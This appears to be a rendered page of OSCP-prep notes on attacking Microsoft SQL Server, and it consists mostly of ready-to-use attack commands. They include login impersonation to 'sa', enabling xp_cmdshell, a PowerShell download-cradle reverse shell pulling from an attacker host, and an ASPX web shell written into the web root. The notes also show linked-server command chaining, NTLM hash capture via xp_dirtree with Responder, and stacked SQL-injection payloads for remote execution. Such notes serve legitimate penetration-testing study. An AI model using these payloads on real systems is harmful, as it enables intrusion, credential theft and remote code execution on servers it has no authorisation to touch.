// notes/ Service Enumeration
🗄️
MSSQL Attacks (1433)
xp_cmdshell, impersonation, linked servers, and OS command execution via MSSQL.
#mssql#port 1433#database
source · airouboss/oscp-prep-notes-2026 · concepts/mssql-attacks.md ↗MSSQL Attacks
Connecting
bash
$# With Windows auth:$impacket-mssqlclient 'DOMAIN/USER:PASS'@TARGET -windows-auth$# With SQL auth:$impacket-mssqlclient 'sa:password'@TARGET$# NetExec check:$nxc mssql TARGET -u USER -p PASS$nxc mssql TARGET -u USER -p PASS -d DOMAINEnumeration
sql
01-- Current user and role:02SELECT SYSTEM_USER;03SELECT IS_SRVROLEMEMBER('sysadmin');04 05-- List databases:06SELECT name FROM master.sys.databases;07-- Or in impacket: enum_db08 09-- List users:10SELECT name FROM master.sys.server_principals;11 12-- Check impersonation:13SELECT * FROM sys.server_permissions WHERE type = 'IM';14-- Or in impacket: enum_impersonate15 16-- List linked servers:17EXEC sp_linkedservers;18SELECT * FROM sys.servers;Impersonation
sql
01-- If enum_impersonate shows a login you can impersonate:02EXECUTE AS LOGIN = 'sa';03-- Verify:04SELECT SYSTEM_USER;05-- Now you're sa → enable xp_cmdshellxp_cmdshell → RCE
sql
01-- Enable (requires sysadmin):02EXEC sp_configure 'show advanced options', 1; RECONFIGURE;03EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;04-- Or in impacket: enable_xp_cmdshell05 06-- Execute commands:07EXEC xp_cmdshell 'whoami';08EXEC xp_cmdshell 'powershell -e BASE64_REVSHELL';09 10-- Reverse shell one-liner:11EXEC xp_cmdshell 'powershell -c "iex(new-object net.webclient).downloadstring(''http://ATTACKER/shell.ps1'')"';Linked Servers
sql
01-- Enumerate linked servers:02EXEC sp_linkedservers;03 04-- Execute on linked server:05EXEC ('SELECT SYSTEM_USER') AT [LINKED-SERVER];06EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [LINKED-SERVER];07EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [LINKED-SERVER];08EXEC ('EXEC xp_cmdshell ''whoami'';') AT [LINKED-SERVER];09 10-- Double-hop through linked servers:11EXEC ('EXEC (''SELECT SYSTEM_USER'') AT [SECOND-LINK]') AT [FIRST-LINK];File Read/Write
sql
01-- Read file:02SELECT * FROM OPENROWSET(BULK 'C:\inetpub\wwwroot\web.config', SINGLE_CLOB) AS r;03 04-- Write file (OLE Automation):05EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;06DECLARE @OLE INT;07EXEC sp_OACreate 'Scripting.FileSystemObject', @OLE OUT;08DECLARE @FileID INT;09EXEC sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'C:\inetpub\wwwroot\shell.aspx', 8, 1;10EXEC sp_OAMethod @FileID, 'WriteLine', NULL, '<%@ Page Language="C#" %><%Response.Write(System.Diagnostics.Process.Start("cmd","/c "+Request["c"]).StandardOutput.ReadToEnd());%>';11EXEC sp_OADestroy @FileID;12EXEC sp_OADestroy @OLE;NTLM Hash Capture
sql
01-- Force MSSQL to auth to your SMB server:02EXEC xp_dirtree '\\ATTACKER-IP\share', 1, 1;03-- Or:04EXEC master..xp_subdirs '\\ATTACKER-IP\share';05 06-- On attacker, catch with responder or smbserver:07sudo responder -I eth008-- Or:09impacket-smbserver share . -smb2supportSQLi → MSSQL RCE
code
01# Stacked queries through SQL injection:02'; EXEC sp_configure 'show advanced options',1; RECONFIGURE;-- -03'; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- -04'; EXEC xp_cmdshell 'whoami';-- -Key Notes
- Default port: 1433 (TCP), 1434 (UDP for browser service)
sais the built-in sysadmin account- Windows auth uses the AD/machine credentials
- Impersonation is a common OSCP vector — always check
enum_impersonate - Linked servers can chain access across multiple SQL instances